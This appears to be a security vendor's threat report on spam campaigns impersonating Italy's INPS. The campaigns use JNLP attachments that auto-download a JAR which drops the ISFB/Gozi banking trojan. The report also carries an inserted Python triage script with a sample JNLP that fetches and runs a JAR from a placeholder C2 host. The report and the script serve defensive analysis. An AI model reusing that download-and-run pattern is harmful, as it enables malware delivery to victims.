Forcepoint X-Labs have recently been monitoring emerging malware distribution campaigns that utilize the Java platform. Java downloaders have been a known threat for quite a while, yet there is at least one unexplored feature of the platform that helps to automate malware download and execution. The Java Network Launch Protocol (JNLP) was intended to be a simple mechanism for starting remote Java applications by double-clicking on the equivalent of a Windows Link file. It is currently being leveraged as a novel way to auto-execute malicious Java files.
What is Java Web Start?
Java Web Start, or the Java Network Launch Protocol (JNLP) as programmers often refer to it, is an XML-based protocol designed for the sole purpose of automatically starting Java applications from a remote location. For that to work, the JNLP file must contain the host address and path of the target Java application package (JAR) to be downloaded and executed. Once the user double-clicks a JNLP file, Java attempts to reach the host described in the XML structure, downloads the specified JAR package and, if successful, executes it. The only prerequisite is the presence of the Java Runtime Environment (JRE) on the local PC.
Side note: If you are unsure whether you have Java installed on your machine, you can perform a quick check as per this guide.
If you do, it might be worth flagging to your IT team. We have been warning of the vulnerable nature of Java since at least 2013.
It is rather obvious that this functionality provides an appealing opportunity for automating the download and execution of a malicious file.
The Italian Job
Malicious spam campaigns utilizing a JNLP attachment - either as-is or inside a ZIP archive - started to appear in recent weeks. The messages appear to come from the INPS (Istituto Nazionale della Previdenza Sociale), the main entity of Italy's public retirement system. Interestingly, the INPS website was itself subject to attack in early 2020 as Italian citizens started to apply for benefits; this time the organization's name is being used as a lure, such is its relevance.
The message encourages recipients to check their balance and claim a refund by opening the attachment. The INPS logo is included; however, a closer look at the sender address, the clumsily written message body and the attachment makes it easy to see that the email is suspicious. Opening the JNLP attachment in a text editor clearly reveals the first-stage C2 address.
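The attachment inspection described above, automated as an added Python example that is not part of the original post: it reads a JNLP file (bare, or inside a ZIP archive as seen in this campaign), resolves the JAR that Java would fetch against the codebase, and flags remote-JAR and all-permissions requests. The sample JNLP, its placeholder host and the function names are constructed here for illustration.

```python
import io
import urllib.parse
import xml.etree.ElementTree as ET
import zipfile

# Constructed sample (not the campaign's real file): a remote codebase, one JAR
# to fetch and a request for full permissions, mirroring the structure above.
# The host is a placeholder, not a real C2 address.
SAMPLE_JNLP = b"""<?xml version="1.0" encoding="utf-8"?>
<jnlp spec="1.0+" codebase="http://c2.example.invalid/files/" href="inps.jnlp">
  <security><all-permissions/></security>
  <resources><jar href="client.jar" main="true"/></resources>
  <application-desc main-class="Main"/>
</jnlp>"""

def wrap_in_zip(data: bytes, name: str = "inps.jnlp") -> bytes:
    """Build an in-memory ZIP with one member, the other attachment form seen."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(name, data)
    return buf.getvalue()

def unwrap_attachment(data: bytes) -> list:
    """Return each JNLP body in an attachment: the bytes themselves, or every
    .jnlp member when the attachment is a ZIP archive (magic 'PK\\x03\\x04')."""
    if data[:4] != b"PK\x03\x04":
        return [data]
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return [zf.read(n) for n in zf.namelist() if n.lower().endswith(".jnlp")]

def inspect_jnlp(data: bytes) -> dict:
    """Pull out the fields that decide what Java will download and execute."""
    root = ET.fromstring(data)
    codebase = root.get("codebase", "")
    app = root.find("application-desc")
    # Java resolves each <jar href> against codebase; these are the fetched URLs.
    jar_urls = [urllib.parse.urljoin(codebase, j.get("href", "")) for j in root.iter("jar")]
    return {
        "codebase": codebase,
        "jar_urls": jar_urls,
        "main_class": app.get("main-class") if app is not None else None,
        "all_permissions": root.find("security/all-permissions") is not None,
        # A JAR fetched from a remote host is the auto-download-and-run pattern.
        "remote_jar": any(u.startswith(("http://", "https://")) for u in jar_urls),
    }

def triage(attachment: bytes) -> list:
    """Gateway-style check over a raw attachment, whether bare JNLP or ZIP."""
    return [inspect_jnlp(body) for body in unwrap_attachment(attachment)]
```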
Visiting the remote location from anywhere other than an Italian IP address results in the server ignoring the request. Together with the exclusively Italian message body and the .it destination email addresses, this indicates the use of geofencing. Visiting the C2 address from the right location results in the download of a small JAR application, around 6 KB in size. On further inspection, this JAR package contains only one Java class, which is unusual for a benign Java application. Decompiling the Java bytecode yields a short piece of source code containing yet another suspicious-looking remote location alongside the official website of the INPS. The latter acts as a decoy: it is opened in a browser while "nazionale.jpg" is silently downloaded and executed in the background.
The second-stage C2 hosts the final payload in the chain and is also geofenced: the "nazionale.jpg" file is only served if it is requested from an accepted geolocation. Note that in certain cases the content of "nazionale.jpg" was later replaced with a benign PuTTY telnet client application before the C2 became unresponsive, likely the result of a takedown operation.
The binaries we have seen deployed on the second-stage C2 have so far been of two kinds: either an NSIS archive with a single embedded file, which the NSIS script loads directly into memory and executes, or a small executable wrapped in a custom executable packer. What they have in common is the payload they deliver: ISFB IAP, a well-known Gozi fork and one of the popular banking trojans.
Small scale campaigns
There have been only a handful of small-scale campaigns using JNLP files, each with fewer than a thousand email messages, and their attributes change frequently. The attachments of the INPS-themed emails were quickly altered: within a couple of days they reverted from JNLP to documents with Excel 4.0 macros. In June, Trustwave noted a COVID-19-themed lure pushing TrickBot, and we recently observed yet another, completely different JNLP-based campaign pushing the NetWire RAT. These frequent changes simply reflect the common TTPs of the threat actors behind these campaigns.
Having autostart functionality in popular applications or platforms does not necessarily mean it is safe to use or was created with security in mind; most likely it just has not been explored and exploited by cybercriminals yet. The Web Start feature of Java is a perfect example of this technique: it has been waiting silently to be revisited by cybercriminals many years after its first malicious use in 2013. Organizations - unless they heavily rely on it - are advised to block JNLP file attachments at the gateway level to prevent unwanted execution and its consequences.
Forcepoint customers are protected against this threat at the following stages of attack:
- Stage 2 (Lure) – Malicious emails associated with these attacks are identified and blocked.
- Stage 5 (Dropper File) – Malicious files are prevented from being downloaded.
- Stage 6 (Call Home) – Attempts to contact C2 servers are blocked.